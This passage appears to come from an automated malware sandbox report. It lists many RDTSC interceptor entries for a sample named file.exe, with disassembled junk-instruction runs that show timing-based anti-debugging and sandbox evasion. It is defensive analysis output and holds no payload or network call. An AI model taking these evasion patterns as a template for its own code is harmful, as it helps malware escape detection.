            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B87A0 second address: 6B87BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F377CE47996h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6B87BC second address: 6B87D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377C5325F0h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73AED7 second address: 73AEDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B083 second address: 73B089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B089 second address: 73B08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B206 second address: 73B20A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4C2 second address: 73B4DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F377CE47986h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f popad 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jns 00007F377CE47986h 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4DD second address: 73B4E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4E1 second address: 73B4E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4E7 second address: 73B4ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B4ED second address: 73B50E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F377CE47986h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B669 second address: 73B674 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F377C5325E6h 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B674 second address: 73B67A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B67A second address: 73B691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377C5325F3h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73B915 second address: 73B919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7412BD second address: 7412C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCD9 second address: 73FCE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jp 00007F377CE47988h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FCE7 second address: 73FCF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 73FF93 second address: 73FF9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7400E3 second address: 7400EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7400EF second address: 7400F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740244 second address: 74026E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F377C5325FFh 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 pop eax 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74026E second address: 740298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47997h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnc 00007F377CE47986h 0x00000010 jl 00007F377CE47986h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740401 second address: 740406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740559 second address: 74055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 74055E second address: 740564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740564 second address: 74058F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F377CE47999h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F377CE47986h 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7407FC second address: 740824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a jmp 00007F377C5325F8h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740824 second address: 740843 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F377CE47997h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740843 second address: 74084B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409B6 second address: 7409BC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409BC second address: 7409CA instructions: 0x00000000 rdtsc 0x00000002 jg 00007F377C5325E8h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7409CA second address: 7409D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740B5B second address: 740B7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007F377C5325E6h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F377C5325F2h 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 740B7D second address: 740B81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03CD second address: 52D03D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D03D1 second address: 52D03E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52D040C second address: 52D041C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE4798Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0837 second address: 52C083B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C083B second address: 52C0841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0841 second address: 52C0891 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 9460h 0x00000011 pushfd 0x00000012 jmp 00007F377C5325F9h 0x00000017 xor si, A166h 0x0000001c jmp 00007F377C5325F1h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0891 second address: 52C096D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47991h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F377CE47991h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F377CE4798Eh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b call 00007F377CE47993h 0x00000020 call 00007F377CE47998h 0x00000025 pop esi 0x00000026 pop ebx 0x00000027 popad 0x00000028 xchg eax, ecx 0x00000029 pushad 0x0000002a jmp 00007F377CE4798Ch 0x0000002f pushfd 0x00000030 jmp 00007F377CE47992h 0x00000035 xor cl, 00000058h 0x00000038 jmp 00007F377CE4798Bh 0x0000003d popfd 0x0000003e popad 0x0000003f push eax 0x00000040 jmp 00007F377CE47999h 0x00000045 xchg eax, ecx 0x00000046 jmp 00007F377CE4798Eh 0x0000004b xchg eax, esi 0x0000004c jmp 00007F377CE47990h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C096D second address: 52C0971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0971 second address: 52C0975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0975 second address: 52C097B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C097B second address: 52C09AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F377CE47996h 0x0000000f lea eax, dword ptr [ebp-04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09AD second address: 52C09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F377C5325F3h 0x00000009 pop eax 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09C6 second address: 52C09FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 2A61BDABh 0x00000008 pushfd 0x00000009 jmp 00007F377CE47990h 0x0000000e or esi, 45FC8738h 0x00000014 jmp 00007F377CE4798Bh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d nop 0x0000001e pushad 0x0000001f pushad 0x00000020 mov cx, A281h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C09FD second address: 52C0A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov al, 03h 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a mov esi, 1082CF7Bh 0x0000000f pushfd 0x00000010 jmp 00007F377C5325F0h 0x00000015 add ax, 00C8h 0x0000001a jmp 00007F377C5325EBh 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F377C5325F6h 0x00000027 push dword ptr [ebp+08h] 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007F377C5325EDh 0x00000033 and cl, FFFFFF96h 0x00000036 jmp 00007F377C5325F1h 0x0000003b popfd 0x0000003c call 00007F377C5325F0h 0x00000041 pop ecx 0x00000042 popad 0x00000043 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B22 second address: 52C0B26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B26 second address: 52C0B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0B2C second address: 52C0B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0199 second address: 52C01C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F377C5325F7h 0x00000008 pop esi 0x00000009 movsx edi, si 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 mov dh, DBh 0x00000013 mov ah, E6h 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01C8 second address: 52C01CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01CC second address: 52C01D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01D0 second address: 52C01D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01D6 second address: 52C01FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01FB second address: 52C01FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C01FF second address: 52C0212 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0212 second address: 52C02F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 call 00007F377CE47990h 0x0000000b pop esi 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push FFFFFFFEh 0x00000011 jmp 00007F377CE47991h 0x00000016 push 50755C89h 0x0000001b jmp 00007F377CE47997h 0x00000020 xor dword ptr [esp], 25B3C2C1h 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F377CE47994h 0x0000002e adc ax, 1538h 0x00000033 jmp 00007F377CE4798Bh 0x00000038 popfd 0x00000039 mov ch, CFh 0x0000003b popad 0x0000003c push 703ED616h 0x00000041 jmp 00007F377CE47990h 0x00000046 add dword ptr [esp], 0582555Ah 0x0000004d jmp 00007F377CE47990h 0x00000052 mov eax, dword ptr fs:[00000000h] 0x00000058 pushad 0x00000059 call 00007F377CE4798Eh 0x0000005e pushfd 0x0000005f jmp 00007F377CE47992h 0x00000064 sub ax, 9128h 0x00000069 jmp 00007F377CE4798Bh 0x0000006e popfd 0x0000006f pop ecx 0x00000070 push eax 0x00000071 push edx 0x00000072 mov edi, 6EF58FCAh 0x00000077 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C02F9 second address: 52C033F instructions: 0x00000000 rdtsc 0x00000002 mov di, DE96h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ecx 0x0000000a jmp 00007F377C5325EAh 0x0000000f mov dword ptr [esp], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov al, dl 0x00000017 pushfd 0x00000018 jmp 00007F377C5325F6h 0x0000001d or ecx, 4158A5E8h 0x00000023 jmp 00007F377C5325EBh 0x00000028 popfd 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0436 second address: 52C043A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C043A second address: 52C0455 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0455 second address: 52C045B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C045B second address: 52C045F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C045F second address: 52C0477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0477 second address: 52C047B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C047B second address: 52C048D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C048D second address: 52C04A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A3 second address: 52C04A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04A7 second address: 52C04AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04AD second address: 52C04E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F377CE4798Eh 0x00000011 xor cl, FFFFFFD8h 0x00000014 jmp 00007F377CE4798Bh 0x00000019 popfd 0x0000001a movzx eax, dx 0x0000001d popad 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, bl 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C04E8 second address: 52C0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 mov dx, D2E4h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F377C5325F4h 0x00000016 sub si, B598h 0x0000001b jmp 00007F377C5325EBh 0x00000020 popfd 0x00000021 mov ah, 4Fh 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0521 second address: 52C0527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0527 second address: 52C052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C052B second address: 52C052F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C052F second address: 52C055E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [75C74538h] 0x0000000d jmp 00007F377C5325F8h 0x00000012 xor dword ptr [ebp-08h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov cx, 6EC3h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C055E second address: 52C05A9 instructions: 0x00000000 rdtsc 0x00000002 mov ah, 34h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bl, BAh 0x00000008 popad 0x00000009 xor eax, ebp 0x0000000b jmp 00007F377CE4798Dh 0x00000010 nop 0x00000011 jmp 00007F377CE4798Eh 0x00000016 push eax 0x00000017 jmp 00007F377CE4798Bh 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F377CE47995h 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05A9 second address: 52C05EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377C5325F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F377C5325EEh 0x00000011 mov dword ptr fs:[00000000h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F377C5325F7h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C05EE second address: 52C0606 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F377CE47994h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0606 second address: 52C060A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C060A second address: 52C061B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [ebp-18h], esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C061B second address: 52C061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C061F second address: 52C0623 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0623 second address: 52C0629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C0629 second address: 52C067E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE4798Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr fs:[00000018h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F377CE4798Bh 0x00000018 xor si, BBFEh 0x0000001d jmp 00007F377CE47999h 0x00000022 popfd 0x00000023 call 00007F377CE47990h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C067E second address: 52C06A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 1A9F3C0Dh 0x00000008 call 00007F377C5325EAh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ecx, dword ptr [eax+00000FDCh] 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 52C06A0 second address: 52C06BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F377CE47996h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
